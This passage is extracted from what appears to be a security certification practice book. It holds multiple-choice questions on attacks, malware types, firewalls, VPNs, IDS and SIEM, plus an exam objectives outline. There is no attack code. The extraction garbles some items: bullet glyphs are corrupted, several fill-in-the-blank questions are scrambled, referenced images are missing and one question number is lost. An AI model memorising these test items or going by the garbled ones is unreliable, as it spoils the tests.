908D. Session hijacking
909126. Your company has hired a penetration testing firm to test the company network security.
910The penetration tester has just been able to achieve guest-level privileges on one low-
911security system. What best describes this phase of the test?
912A. Vulnerability scanning
913B. Initial exploit
914C. Black-box testing
915D. White-box testing
916127. What is the primary risk from using outdated software?
917A. It may not have all the features you need.
918B. It may not have the most modern security features.
919C. It may no longer be supported by the vendor.
920D. It may be easier to break into than newer software.
921128. You are responsible for software testing at Acme Corporation. You want to check all soft-
922ware for bugs that might be used by an attacker to gain entrance into the software or your
923network. You have discovered a web application that would allow a user to attempt to put
924a 64-bit value into a 4-byte integer variable. What is this type of flaw?
925A. Memory overflow
926B. Buffer overflow
927C. Variable overflow
928D. Integer overflow
929129. Which type of virus is most difficult to analyze by reverse engineering?
930A. Polymorphic
931B. Macro
932C. Armored
933D. Boot sector
934130. What type of attack attempts to deauthorize users from a resource, such as a wireless
935access point (WAP)?
936A. Disassociation
937B. Session hijacking
938C. Man-in-the-middle
939D. Smurf attack
940131. John is a network administrator for a large retail chain. He has discovered that his
941DNS server is being attacked. The attack involves false DNS requests from spoofed IP
942addresses. The requests are far larger than normal. What type of attack is this?
943A. Amplification
944B. DNS poisoning
945C. DNS spoofing
946D. Smurf attack
947132. Heidi is a security officer for an investment firm. Many of the employees in her firm travel
948frequently and access the company intranet from remote locations. Heidi is concerned about
949users logging in from public WiFi, as well as other people seeing information such as login
950credentials or customer data. Which of the following is Heidi’s most significant concern?
951A. Social engineering
952B. Shoulder surfing
953C. Man-in-the-middle attack
954D. CSRF
955133. Cross-site scripting is an attack on the
956.
957that is based on the
958trusting the
959A. user, user, website
960B. user, website, user
961C. website, website, user
962D. user, website, website
963134. You are a security officer for a large investment firm. Some of your stock traders handle
964very valuable accounts with large amounts of money. You are concerned about someone
965targeting these specific traders to get their login credentials and access account informa-
966tion. Which of the following best describes the attack you are concerned about?
967A. Spear phishing
968B. Man-in-the-middle
969C. Target phishing
970D. Vishing
971135. You lead an incident response team for a large retail chain store. You have discovered
972what you believe is spyware on the point-of-sale systems. But the malware in question is
973encrypted, preventing you from analyzing it. What best describes this?
974A. An armored virus
975B. Ransomware
976C. Polymorphic virus
977D. Trojan horse
978136. Jared has discovered malware on the workstations of several users. This particular mal-
979ware provides administrative privileges for the workstation to an external hacker. What
980best describes this malware?
981A. Trojan horse
982B. Logic bomb
983C. Multipartite virus
984D. Rootkit
985137. Users in your company report someone has been calling their extension and claiming to
986be doing a survey for a large vendor. Based on the questions asked in the survey, you sus-
987pect that this is a scam to elicit information from your company’s employees. What best
988describes this?
989A. Spear phishing
990B. Vishing
991C. War dialing
992D. Robocalling
993138. Cross-site request forgery is an attack on the
994trusting the
995.
99633
997that is based on the
998A. website, website, user
999B. user, user website
1000C. website, user, website
1001D. user, website, user
1002139. What type of virus can infect both a file in the operating system and the boot sector?
1003A. Multipartite
1004B. Rootkit
1005C. Ransomware
1006D. Worm
1007140. John is analyzing a recent malware infection on his company network. He discovers mal-
1008ware that can spread rapidly and does not require any interaction from the user. What
1009best describes this malware?
1010A. Worm
1011B. Virus
1012C. Logic bomb
1013D. Trojan horse
1014141. Your company has issued some new security directives. One of these new directives is that
1015all documents must be shredded before being thrown out. What type of attack is this try-
1016ing to prevent?
1017A. Phishing
1018B. Dumpster diving
1019C. Shoulder surfing
1020D. Man-in-the-middle
1021142. What type of attack embeds malicious code into a document or spreadsheet?
1022A. Logic bomb
1023B. Rootkit
1024C. Trojan horse
1025D. Macro virus
1026143. You are a network security analyst for an online retail website. Users report that they
1027have visited your site and had their credit cards stolen. You cannot find any evidence of
1028any breach of your website. You begin to suspect that these users were lured to a fake site.
1029You have found a website that is spelled exactly like your company site, with one letter
1030different. What is this attack called?
1031A. URL hijacking
1032B. DNS poisoning
1033C. Cross-site scripting
1034D. Man-in-the-middle
1035144. You have discovered that someone has been trying to log on to your web server. The person
1036has tried a wide range of likely passwords. What type of attack is this?
1037A. Rainbow table
1038B. Birthday attack
1039C. Dictionary attack
1040D. Spoofing
1041145. You have just started a new job as a security administrator for Acme Corporation. You
1042discover they have weak authentication protocols. You are concerned that an attacker
1043might simply capture and re-send a user’s login credentials. What type of attack is this?
1044A. Replay attack
1045B. IP spoofing
1046C. Login spoofing
1047D. Session hijacking
1048146. What is the primary difference between active and passive reconnaissance?
1049A. Active will be done manually, passive with tools.
1050B. Active is done with black-box tests and passive with white-box tests.
1051C. Active is usually done by attackers and passive by testers.
1052D. Active will actually connect to the network and could be detected; passive won’t.
1053147. What is the primary difference between a vulnerability scan and a penetration test?
1054A. Vulnerability scans are done by employees and penetration tests by outside teams.
1055B. Vulnerability scans only use tools; penetration tests are manual.
1056C. Vulnerability scans just identify issues; penetration tests attempt to exploit them.
1057D. Vulnerability scans are usually white-box tests; penetration tests are black-box tests.
1058148. When an attacker breaches one system and uses that as a base to attack a related system,
1059what is this called?
1060A. Man-in-the-middle
1061B. Pivot
1062C. Shimming
1063D. Vishing
1064149. Terrance is conducting a penetration test for a client. The client is a major e-commerce
1065company and is primarily concerned about security for their web server. He has just
1066finished running Nmap and OWASP Zap on the target web server. What is this activity
1067called?
1068A. Passive scanning
1069B. Black-box testing
1070C. Active scanning
1071D. White-box testing
1072150. You have just taken over as the CISO for a large bank. You are concerned about making
1073sure all systems are secure. One major concern you have is security misconfiguration.
1074Which of the following is not a common security misconfiguration?
1075A. Unpatched operating system
1076B. Default accounts with passwords
1077C. Unneeded services running
1078D. No firewall running
1079
1080
1081+++++++++++
1082
1083
10842
1085Install and configure network components,
1086both hardware- and software-based, to support
1087organizational security.
1088â– â–
1089â– â–
1090â– â–
1091Firewall
1092â– â– ACL
1093â– â– Application-based vs. network-based
1094â– â– Stateful vs. stateless
1095â– â– Implicit deny
1096VPN concentrator
1097â– â– Remote access vs. site-to-site
1098â– â– IPSec
1099â– â– Tunnel mode
1100â– â– Transport mode
1101â– â– AH
1102â– â– ESP
1103â– â– Split tunnel vs. full tunnel
1104â– â– TLS
1105â– â– Always-on VPN
1106NIPS/NIDS
1107â– â– Signature-based
1108â– â– Heuristic/behavioral
1109â– â– Anomaly
1110â– â– Inline vs. passive
1111â– â– In-band vs. out-of-band
1112â– â– Rule
1113â– â– False positive
1114â– â– False negative
1115Router
1116â– â– ACLs
1117â– â– Antispoofing
1118Switch
1119â– â– Port security
1120â– â– Layer 2 vs. Layer 3
1121â– â– Loop prevention
1122â– â– Flood guard
1123Proxy
1124â– â– Forward and reverse proxy
1125â– â– Transparent
1126â– â– Application/multipurpose
1127Load balancer
1128â– â–
1129â– â–
1130Analytics
1131Scheduling
1132â– â– Affinity
1133â– â– Round-robin
1134â– â– Active-passive
1135â– â– Active-active
1136â– â– Virtual IPs
1137Access point
1138â– â– SSID
1139â– â– MAC filtering
1140â– â– Signal strength
1141â– â– Band selection/width
1142â– â– Antenna types and placement
1143â– â– Fat vs. thin
1144â– â– Controller-based vs. standalone
1145SIEM
1146â– â–
1147Aggregationâ– â–
1148â– â–
1149â– â–
1150â– â– Correlation
1151â– â– Automated alerting and triggers
1152â– â– Time synchronization
1153â– â– Event deduplication
1154â– â– Logs/WORM
1155DLP
1156â– â– USB blocking
1157â– â– Cloud-based
1158â– â– Email
1159NAC
1160â– â– Dissolvable vs. permanent
1161â– â– Host health checks
1162â– â– Agent vs. agentless
1163Mail gateway
1164â– â– Spam filter
1165â– â– DLP
1166â– â– Encryption
1167â– â– Bridge
1168â– â– SSL/TLS accelerators
1169â– â– SSL decryptors
1170â– â– Media gateway
1171â– â– Hardware security module
1172✓ ✓ 2.2 Given a scenario, use appropriate software tools to
1173assess the security posture of an organization.
1174â– â– Protocol analyzer
1175â– â– Network scanners
1176â– â–
1177Rogue system detection
1178â– â–
1179Network mapping
1180â– â– Wireless scanners/cracker
1181â– â– Password cracker
1182â– â– Vulnerability scanner
1183â– â– Configuration compliance scannerâ– â– Exploitation frameworks
1184â– â– Data sanitization tools
1185â– â– Steganography tools
1186â– â– Honeypot
1187â– â– Backup utilities
1188â– â– Banner grabbing
1189â– â– Passive vs. active
1190â– â– Command line tools
1191â– â– ping
1192â– â– netstat
1193â– â– tracert
1194â– â– nslookup/dig
1195â– â– arp
1196â– â– ipconfig/ip/ifconfig
1197â– â– tcpdump
1198â– â– nmap
1199â– â– netcat
1200✓ ✓ 2.3 Given a scenario, troubleshoot common
1201security issues.
1202â– â– Unencrypted credentials/clear text
1203â– â– Logs and events anomalies
1204â– â– Permission issues
1205â– â– Access violations
1206â– â– Certificate issues
1207â– â– Data exfiltration
1208â– â– Misconfigured devices
1209â– â– Firewall
1210â– â– Content filter
1211â– â– Access points
1212â– â– Weak security configurations
1213â– â– Personnel issues
1214â– â–
1215Policy violationâ– â– Insider threat
1216â– â– Social engineering
1217â– â– Social media
1218â– â– Personal email
1219â– â– Unauthorized software
1220â– â– Baseline deviation
1221â– â– License compliance violation (availability/integrity)
1222â– â– Asset management
1223â– â– Authentication issues
1224✓ ✓ 2.4 Given a scenario, analyze and interpret output from
1225security technologies.
1226â– â– HIDS/HIPS
1227â– â– Antivirus
1228â– â– File integrity check
1229â– â– Host-based firewall
1230â– â– Application whitelisting
1231â– â– Removable media control
1232â– â– Advanced malware tools
1233â– â– Patch management tools
1234â– â– UTM
1235â– â– DLP
1236â– â– Data execution prevention
1237â– â– Web application firewall
1238✓ ✓ 2.5 Given a scenario, deploy mobile devices securely.
1239â– â–
1240Connection methods
1241â– â– Cellular
1242â– â– WiFi
1243â– â– SATCOM
1244â– â– Bluetooth
1245â– â– NFC
1246â– â– ANTâ– â–
1247â– â–
1248â– â– Infrared
1249â– â– USB
1250Mobile device management concepts
1251â– â– Application management
1252â– â– Content management
1253â– â– Remote wipe
1254â– â– Geofencing
1255â– â– Geolocation
1256â– â– Screen locks
1257â– â– Push notification services
1258â– â– Passwords and pins
1259â– â– Biometrics
1260â– â– Context-aware authentication
1261â– â– Containerization
1262â– â– Storage segmentation
1263â– â– Full device encryption
1264Enforcement and monitoring for:
1265â– â– Third-party app stores
1266â– â– Rooting/jailbreaking
1267â– â– Sideloading
1268â– â– Custom firmware
1269â– â– Carrier unlocking
1270â– â– Firmware OTA updates
1271â– â– Camera use
1272â– â– SMS/MMS
1273â– â– External media
1274â– â– USB OTG
1275â– â– Recording microphone
1276â– â– GPS tagging
1277â– â– WiFi direct/ad hoc
1278â– â– Tethering
1279â– â– Payment methodsâ– â–
1280Deployment models
1281â– â– BYOD
1282â– â– COPE
1283â– â– CYOD
1284â– â– Corporate-owned
1285â– â– VDI
1286✓ ✓ 2.6 Given a scenario, implement secure protocols.
1287â– â–
1288â– â–
1289Protocols
1290â– â– DNSSEC
1291â– â– SSH
1292â– â– S/MIME
1293â– â– SRTP
1294â– â– LDAPS
1295â– â– FTPS
1296â– â– SFTP
1297â– â– SNMPv3
1298â– â– SSL/TLS
1299â– â– HTTPS
1300â– â– Secure POP/IMAP
1301Use cases
1302â– â– Voice and video
1303â– â– Time synchronization
1304â– â– Email and web
1305â– â– File transfer
1306â– â– Directory services
1307â– â– Remote access
1308â– â– Domain name resolution
1309â– â– Routing and switching
1310â– â– Network address allocation
1311â– â– Subscription services
1312â–
1313Technologies and Tools
13141. John is looking for a new firewall for a small company. He is concerned about DoS
1315attacks, particularly the SYN flood. Which type of firewall would give the best protection
1316against the SYN flood?
1317A. Packet filter
1318B. Application gateway
1319C. Bastion
1320D. SPI
1321
13222. You are responsible for network security at an insurance company. A lot of employ-
1323ees bring their own devices. You have security concerns about this. You have decided
1324to implement a process whereby when users connect to your network, their devices are
1325scanned. If a device does not meet your minimum security requirements, it is not allowed
1326to connect. What best describes this?
1327A. NAC
1328B. SPI
1329C. IDS
1330D. BYOD
1331
13323. Ahmed is responsible for VPN connections at his company. His company uses IPSec
1333exclusively. He has decided to implement IPSec in a mode that encrypts the data of only
1334the packet, not the headers. What is this called?
1335A. Tunneling
1336B. IKE
1337C. ESP
1338D. Transport
1339
13404. Maria is responsible for monitoring IDS activity on her company’s network. Twice in the
1341past month there has been activity reported on the IDS that investigation has shown was
1342legitimate traffic. What best describes this?
1343A. False negative
1344B. Passive
1345C. Active
1346
1347D. False positive
13485. Juanita is a network administrator for a large university. The university has numerous
1349systems, each with logs she must monitor and analyze. What would be the best approach
1350for her to view and analyze logs from a central server?
1351A. NAC
1352B. Port forwarding
1353C. IDS
1354
1355D. SIEMChapter 2
1356
13576. Enrique is responsible for web application security at his company. He is concerned about
1358attacks such as SQL injection. Which of the following devices would provide the best pro-
1359tection for web attacks on his web application server?
1360A. ACL
1361B. SPI
1362C. WAF
1363D. IDS
1364
13657. ACME Company has several remote offices. The CIO wants to set up permanent secure
1366connections between the remote offices and the central office. What would be the best
1367solution for this?
1368A. L2TP VPN
1369B. IPSEC VPN
1370C. Site-to-site VPN
1371D. Remote-access VPN
1372
13738. Mary is responsible for network security at a medium-sized insurance company. She is
1374concerned that the offices are too open to public traffic and someone could simply con-
1375nect a laptop to an open RJ45 jack and access the network. Which of the following would
1376best address this concern?
1377A. ACL
1378B. IDS
1379C. VLAN
1380D. Port security
1381
13829. You are the network administrator for an e-commerce company. You are responsible for
1383the web server cluster. You are concerned about not only failover, but also load-balancing
1384and using all the servers in your cluster to accomplish load-balancing. What should you
1385implement?
1386A. Active-active
1387B. Active-passive
1388C. Affinity
1389D. Round-robin
139010. Donald is working as a network administrator. He is responsible for the database cluster.
1391Connections are load-balanced in the cluster by each new connection being simply sent to
1392the next server in the cluster. What type of load-balancing is this?
1393A. Round-robin
1394B. Affinity
1395C. Weighted
1396D. Rotating
139711. Gerald is setting up new wireless access points throughout his company’s building. The
1398wireless access points have just the radio transceiver, with no additional functionality.
1399What best describes these wireless access points?
1400A. Fat
1401B. Repeater
1402C. Thick
1403D. Thin
140412. Mohaned is an IT manager for a hotel. His hotel wants to put wireless access points on
1405each floor. The specifications state that the wireless access points should have minimal
1406functionality, with all the configuration, authentication, and other functionality centrally
1407controlled. What type of wireless access points should Mohaned consider purchasing?
1408A. Fat
1409B. Controller-based
1410C. Stand-alone
1411D. 801.11i
141213. What IPSec protocol provides authentication and encryption?
1413A. AH
1414B. ESP
1415C. IKE
1416D. ISAKMP
141714. Terrance is implementing IPSec. He wants to ensure that the packets are encrypted, and
1418that the packet and all headers are authenticated. What should he implement?
1419A. AH
1420B. ESP
1421C. AH and ESP
1422D. IKE
142315. You are responsible for security at your company. One of management’s biggest concerns
1424is that employees might exfiltrate sensitive data. Which of the following would you
1425implement first?
1426A. IPS
1427B. Routine audits of user machines
1428C. VLAN
1429D. USB blocking
143016. You are responsible for email server security in your company. You want to implement
1431encryption of all emails, using third-party authenticated certificates. What protocol
1432should you implement?
1433A. IMAP
1434B. S/MIMEChapter 2
1435C. PGP
1436D. SMTP-S
1437
143817. Joanne is responsible for all remote connectivity to her company’s network. She knows
1439that administrators frequently log in to servers remotely to execute command-line com-
1440mands and Linux shell commands. She wants to make sure this can only be done if the
1441transmission is encrypted. What protocol should she use?
1442A. HTTPS
1443B. RDP
1444C. Telnet
1445D. SSH
144618. You are responsible for network management at your company. You have been using
1447SNMP for many years. You are currently using SNMP v2. A colleague has recently
1448suggested you upgrade to SNMP v3. What is the primary benefit of SNMP v3?
1449A. It is much faster.
1450B. It integrates with SIEM.
1451C. It uses CHAP authentication.
1452D. It is encrypted.
145319. Employees in your company are allowed to use tablets. They can select a tablet from four
1454different models approved by the company but purchased by the employee. What best
1455describes this?
1456A. BYOD
1457B. CYOD
1458C. COPE
1459D. BYOE
146020. Mahmoud is considering moving all company desktops to a VDI deployment. Which of
1461the following would be a security advantage of VDI?
1462A. Employees can work from any computer in the company.
1463B. VDI is more resistant to malware.
1464C. Patch management is centrally controlled.
1465D. It eliminates man-in-the-middle attacks.
146621. You have been assigned to select a backup communication method for your company to
1467use in case of significant disasters that disrupt normal communication. Which option
1468would provide the most reliability?
1469A. Cellular
1470B. WiFi
1471C. SATCOM
1472D. VoIP
147322. John is concerned about the security of data on smartphones and tablets that his company
1474issues to employees. Which of the following would be most effective in preventing data
1475loss, should a device be stolen?
1476A. Remote wipe
1477B. Geolocation
1478C. Strong PIN
1479D. Limited data storage
148023. What does geofencing accomplish?
1481A. Provides the location for a mobile device.
1482B. Limits the range a mobile device can be used in.
1483C. Determines WiFi coverage areas.
1484D. Segments the WiFi.
148524. What best describes mobile device content management?
1486A. Limiting how much content can be stored.
1487B. Limiting the type of content that can be stored.
1488C. Blocking certain websites.
1489D. Digitally signing authorized content.
149025. Frank believes there could be a problem accessing the DHCP server from a specific client.
1491He wants to check by getting a new dynamic IP. What command will do this?
1492A. ipconfig /request
1493B. NETSTAT -renew
1494C. ipconfig /renew
1495D. NETSTAT /request
149626. Teresa is responsible for network administration at a health club chain. She is trying for
1497find a communication technology that uses low power and can spend long periods in
1498low-power sleep modes. Which of the following technologies would be the best fit?
1499A. WiFi
1500B. Cellular
1501C. Bluetooth
1502D. ANT
150327. What technology was first introduced in Windows Vista and still exists in Windows that
1504helps prevent malware by requiring user authorization to run executables?
1505A. DEP
1506B. DLP
1507C. UTM
1508D. ANT
1509
151028. John is responsible for security of his company’s new e-commerce server. He wants to
1511ensure that online transactions are secure. What technology should he use?
1512A. L2TP
1513B. IPSec
1514C. SSL
1515D. TLS
151629. Frank is a network administrator for a small college. The college has implemented a
1517simple NIDS. However, the NIDS seems to only catch well-known attacks. What
1518technology is this NIDS likely missing?
1519A. Heuristic scanning
1520B. Signature scanning
1521C. Passive scanning
1522D. Active scanning
152330. You are concerned about an attacker enumerating all of your network. What protocol
1524might help at least mitigate this issue?
1525A. HTTPS
1526B. TLS
1527C. IPSec
1528D. LDAPS
152931. You have been asked to implement a secure protocol for transferring files that uses digital
1530certificates. Which protocol would be the best choice?
1531A. FTP
1532B. SFTP
1533C. FTPS
1534D. SCP
153532. Ahmed is responsible for VoIP at his company. He has been directed to ensure that all
1536VoIP calls have the option to be encrypted. What protocol is best suited for security
1537VoIP calls?
1538A. SIP
1539B. TLS
1540C. SRTP
1541D. SSH
154233. What is the purpose of screen locks on mobile devices?
1543A. To encrypt the device
1544B. To limit access to the device
1545C. To load a specific user’s apps
1546D. To connect to WiFi
154734. Maria is a security engineer with a large bank. Her CIO has asked her to investigate
1548the use of context-aware authentication for online banking. Which of the following best
1549describes context-aware authentication?
1550A. In addition to username and password, authentication is based on the entire context
1551(location, time of day, action being attempted, etc.).
1552B. Without a username or password, authentication is based on the entire context
1553(location, time of day, action being attempted, etc.).
1554C. Authentication that requires a username and password, but in the context of a token
1555or digital certificate
1556D. Authentication that requires a username and password, but not in the context of a
1557token or digital certificate
155835. What does application management accomplish for mobile devices?
1559A. Only allows applications from the iTunes store to be installed
1560B. Ensures the company has a list of all applications on the devices
1561C. Ensures only approved applications are installed on the devices
1562D. Updates patches on all applications on mobile devices
1563Dominick is responsible for security at a medium-sized insurance company. He is very
1564concerned about detecting intrusions. The IDS he has purchased states that he must have
1565an IDS on each network segment. What type of IDS is this?
1566A. Active
1567B. IPS
1568C. Passive
1569D. Inline
157037. Remote employees at your company frequently need to connect to both the secure
1571company network via VPN and open public websites, simultaneously. What technology
1572would best support this?
1573A. Split tunnel
1574B. IPSec
1575C. Full tunnel
1576D. TLS
157738. Denish is looking for a solution that will allow his network to retrieve information from a
1578wide range of web resources, while all traffic passes through a proxy. What would be the
1579best solution?
1580A. Forward proxy
1581B. Reverse proxy
1582C. SPI
1583D. Open proxy
158439. Someone has been rummaging through your company’s trash bins seeking to find
1585documents, diagrams, or other sensitive information that has been thrown out. What
1586is this called?
1587A. Dumpster diving
1588B. Trash diving
1589C. Social engineering
1590D. Trash engineering
159140. Derrick is responsible for a web server cluster at his company. The cluster uses various
1592load-balancing protocols. Derrick wants to ensure that clients connecting from Europe are
1593directed to a specific server in the cluster. What would be the best solution to his problem?
1594A. Affinity
1595B. Binding
1596C. Load balancing
1597D. Round-robin
159841. Teresa is responsible for WiFi security in her company. Her main concern is that there are
1599many other offices in the building her company occupies and that someone could easily
1600attempt to breach their WiFi from one of these locations. What technique would be best
1601in alleviating her concern?
1602A. Using thin WAPs
1603B. Geofencing
1604C. Securing the Admin screen
1605D. WAP placement
160642. Juan is responsible for the SIEM in his company. The SIEM aggregates logs from 12 servers.
1607In the event that a breach is discovered, which of the following would be Juan’s most impor-
1608tant concern?
1609A. Event duplication
1610B. Time synchronization
1611C. Impact assessment
1612D. Correlation
161343. When you are considering an NIDS or NIPS, what are your two most important
1614concerns?
1615A. Cost and false positives
1616B. False positives and false negatives
1617C. Power consumption and cost
1618D. Management interface and cost
161944. Shelly is very concerned about unauthorized users connecting to the company routers.
1620She would like to prevent spoofing. What is the most essential antispoofing technique for
1621routers?
1622A. ACL
1623B. Logon
1624C. NIPS
1625D. NIDS
162645. Farès has implemented a flood guard. What type of attack is this most likely to defend
1627against?
1628A. SYN attack
1629B. DNS poisoning
1630C. MAC spoofing
1631D. ARP spoofing
163246. Terrance is trying to get all of his users to connect to a certificate server on his network.
1633However, some of the users are using machines that are incompatible with the certificate
1634server, and changing those machines is not an option. Which of the following would be
1635the best solution for Terrance?
1636A. Use an application proxy for the certificate server.
1637B. Use NAT with the certificate server.
1638C. Change the server.
1639D. Implement a protocol analyzer.
164047. John is implementing virtual IP load-balancing. He thinks this might alleviate network
1641slowdowns, and perhaps even mitigate some of the impact of a denial-of-service attack.
1642What is the drawback of virtual IP load-balancing?
1643A. It is resource-intensive.
1644B. Most servers don’t support it.
1645C. It is connection-based, not load-based.
1646D. It works only on Unix/Linux servers.
164748. There has been a breach of the ACME network. John manages the SIEM at ACME. Part
1648of the attack disrupted NTP; what SIEM issue would this most likely impact?
1649A. Time synchronization
1650B. Correlation
1651C. Event duplication
1652D. Events not being logged
165349. What command would produce the image shown here?
1654A. ping -n 6 -l 100 192.168.1.1
1655B. ping 192.168.1.1 -n 6 -s 100
1656C. ping #6 s 100 192.168.1.1
1657D. ping -s 6 -w 100 192.168.1.1
165850. You are a security officer for a large law firm. You are concerned about data loss preven-
1659tion. You have limited the use of USBs and other portable media, you use an IDS to look
1660for large volumes of outbound data, and a guard searches all personnel and bags before
1661they leave the building. What is a key step in DLP that you have missed?
1662A. Portable drives
1663B. Email
1664C. Bluetooth
1665D. Optical media
166651. Which of the following email security measures would have the most impact on
1667phishing emails?
1668A. Email encryption
1669B. Hardening the email server
1670C. Digitally signing email
1671D. Spam filter
167252. Joanne has implemented TLS for communication with many of her networks servers. She
1673wants to ensure that the traffic cannot be sniffed. However, users now complain that this
1674is slowing down connectivity. Which of the following is the best solution?
1675A. Increase RAM on servers.
1676B. Change routers to give more bandwidth to traffic to these servers.
1677C. Implement TLS accelerators.
1678D. Place all servers in clusters with extensive load-balancing.
167953. Olivia has discovered steganography tools on an employee’s computer. What is the
1680greatest concern regarding employees having steganography tools?
1681A. Password cracking
1682B. Data exfiltration
1683C. Hiding network traffic
1684D. Malware
168554. What command would generate the output shown here?
1686A. netstat -a
1687B. netstat -o
1688C. arp -a
1689D. arp -g
169055. John has discovered that an attacker is trying to get network passwords by using software
1691that attempts a number of passwords from a list of common passwords. What type of
1692attack is this?
1693A. Dictionary
1694B. Rainbow table
1695C. Brute force
1696D. Session hijacking
169756. Isabella has found netcat installed on an employee’s computer. That employee is not
1698authorized to have netcat. What security concern might this utility present?
1699A. It is a password cracker.
1700B. It is a packet sniffer.
1701C. It is a network communication utility.
1702D. It is a DoS tool.
170357. Omar is a network administrator for ACME Company. He is responsible for the cer-
1704tificate authorities within the corporate network. The CAs publish their CRLs once per
1705week. What, if any, security issue might this present?
1706A. Revoked certificates still being used
1707B. Invalid certificates being issued
1708C. No security issue
1709D. Certificates with weak keys
171058. Hans is a network administrator for a large bank. He is concerned about employees vio-
1711lating software licenses. What would be the first step in addressing this issue?
1712A. Performing software audits
1713B. Scanning the network for installed applications
1714C. Establishing clear policies
1715D. Blocking the ability of users to install software
171659. You are responsible for authentication methods at your company. You have implemented
1717fingerprint scanners to enter server rooms. Frequently people are being denied access to
1718the server room, even though they are authorized. What problem is this?
1719A. FAR
1720B. FRR
1721C. CER
1722D. EER
172360. John is responsible for network security at a very small company. Due to both budget
1724constraints and space constraints, John can select only one security device. What should
1725he select?
1726A. Firewall
1727B. Antivirus
1728C. IDS
1729D. UTM
173061. You are responsible for security at Acme Company. Recently, 20 new employee network
1731accounts were created, with the default privileges for the network. You have discovered
1732that eight of these have privileges that are not needed for their job tasks. Which security
1733principle best describes how to avoid this problem in the future?
1734A. Least privileges
1735B. Separation of duties
1736C. Implicit deny
1737D. Weakest link
173862. Mary is concerned that SIEM logs at her company are not being stored long enough, or
1739securely enough. She is aware that it is possible a breach might not be discovered until
1740long after it occurs. This would require the company to analyze older logs. It is important
1741that Mary find an SIEM log backup solution that can a) handle all the aggregate logs of
1742the SIEM, b) be maintained for a long period of time, and c) be secure. What solution
1743would be best for her?
1744A. Back up to large-capacity external drives.
1745B. Back up to large-capacity backup tapes.
1746C. Back up to WORM storage.
1747D. Back up to tapes that will be stored off-site.
174863. Elizabeth is responsible for SIEM systems in her company. She monitors the company’s
1749SIEM screens every day, checking every hour. What, if any, would be a better approach
1750for her to keep up with issues that appear in the logs?
1751A. Automatic alerts
1752B. Having logs forwarded to her email
1753C. Nothing, this is fine.
175464. You are responsible for network security at a university. Faculty members are issued
1755laptops. However, many of the faculty members leave the laptops in their offices most of
1756the time (sometimes even for weeks). You are concerned about theft of laptops. In this
1757scenario, what would be the most cost-effective method of securing the laptops?
1758A. FDE
1759B. GPS tagging
1760C. Geofencing
1761D. Tethering
176265. You work at a defense contracting company. You are responsible for mobile device
1763security. Some researchers in your company use company-issued tablets for work. These
1764tablets may contain sensitive, even classified data. What is the most important security
1765measure for you to implement?
1766A. FDE
1767B. GPS tagging
1768C. Geofencing
1769D. Content management
177066. When using any HIDS/HIPS or NIDS/NIPS, the output is specific to the vendor. How-
1771ever, what is the basic set of information that virtually all HIDSs/HIPSs or
1772NIDSs/NIPSs provide?
1773A. IP addresses (sender and receiver), ports (sender and receiver), and protocol
1774B. IP addresses (sender and receiver), ports (sender and receiver), and attack type
1775C. IP addresses (sender and receiver), ports (sender and receiver), usernames, and
1776machine names
1777D. Usernames, machine names, and attack type
177867. You are responsible for firewalls in your company. You are reviewing the output of the
1779gateway firewall. What basic information would any firewall have in its logs?
1780A. For all traffic: the source and destination IP and port, protocol, and whether it was
1781allowed or denied
1782B. For only blocked traffic: the source and destination IP and port as well as the reason
1783for the traffic being denied/blocked
1784C. For all traffic: the source and destination IP and port, whether it was allowed or
1785denied, and the reason it was denied/blocked
1786D. For only blocked traffic: the source and destination IP, protocol, and the reason it
1787was denied/blocked
178868. Teresa is responsible for incident response at ACME Company. There was a recent breach
1789of the network. The breach was widespread and affected many computers. As part of the
1790incident response process, Teresa will collect the logs from the SIEM, which aggregates
1791logs from 20 servers. Which of the following should she do first?
1792A. Event de-duplication
1793B. Log forwardingChapter 2
1794C. Identify the nature of the attack
1795D. Identify the source IP of the attack
179669. Hector is responsible for NIDS/NIPS in his company. He is configuring a new NIPS
1797solution. What part of the NIPS collects data?
1798A. Sensor
1799B. Data source
1800C. Manager
1801D. Analyzer
180270. Gerald is a network administrator for a small financial services company. He is respon-
1803sible for controlling access to resources on his network. What mechanism is responsible
1804for blocking access to a resource based on the requesting IP address?
1805A. ACL
1806B. NIPS
1807C. HIPS
1808D. Port blocking
180971. Elizabeth is responsible for secure communications at her company. She wants to give
1810administrators the option to log in remotely and to execute command-line functions, but
1811she wants this to only be possible via a secure, encrypted connection. What action should
1812she take on the firewall?
1813A. Block port 23 and allow ports 20 and 21.
1814B. Block port 22 and allow ports 20 and 21.
1815C. Block port 22 and allow port 23.
1816D. Block port 23 and allow port 22.
181772. Mark is looking for a proxy server for his network. The purpose of the proxy server is
1818to ensure that the web servers are hidden from outside clients. All of the different web
1819servers should appear to the outside world as if they were the proxy server. What type of
1820proxy server would be best for Mark to consider?
1821A. Forward
1822B. Reverse
1823C. Transparent
1824D. Firewall
182573. Your company has hired an outside security firm to perform various tests of your
1826network. During the vulnerability scan you will provide that company with logins for
1827various systems (i.e., database server, application server, web server, etc.) to aid in their
1828scan. What best describes this?
1829A. A white-box test
1830B. A gray-box test
1831C. A credentialed scan
1832D. A logged-in scan
183374. Lars is responsible for incident response at ACME Company. He is particularly concerned
1834about the network segment that hosts the corporate web servers. He wants a solution that
1835will detect potential attacks and notify the administrator so the administrator can take
1836whatever action he or she deems appropriate. Which of the following would be the best
1837solution for Lars?
1838A. HIDS
1839B. HIPS
1840C. NIDS
1841D. NIPS
184275. Mia is responsible for security devices at her company. She is concerned about detecting
1843intrusions. She wants a solution that would work across entire network segments. How-
1844ever, she wants to ensure that false positives do not interrupt work flow. What would be
1845the best solution for Mia to consider?
1846A. HIDS
1847B. HIPS
1848C. NIDS
1849D. NIPS
185076. Abigail is a security manager for a small company. Many employees want to use handheld
1851devices, such as smartphones and tablets. The employees want to use these devices both
1852for work and outside of work. Abigail is concerned about security issues. Which of the
1853following would be the most secure solution?
1854A. COPE
1855B. CYOD
1856C. Geotagging
1857D. BYOD
185877. You are responsible for always-on VPN connectivity for your company. You have been
1859told that you must use the most secure mode for IPSec that you can. Which of the follow-
1860ing would be the best for you to select?
1861A. Tunneling
1862B. AH
1863C. IKE
1864D. Transport
186578. Debra is the network administrator for her company. Her company’s web servers are all in
1866a cluster. Her concern is this: if one of the servers in the cluster fails, will the backup server
1867be capable of running for a significant amount of time? She wants to make sure that the
1868backup won’t soon fail. What would be her best choice in clustering?
1869A. Active-active
1870B. Round-robin
1871C. Affinity
1872D. Active-passive
187379. Omar is responsible for wireless security in his company. He wants completely different
1874WiFi access (i.e., a different SSID, different security levels, and different authentication
1875methods) in different parts of the company. What would be the best choice for Omar to
1876select in WAPs?
1877A. Fat
1878B. Thin
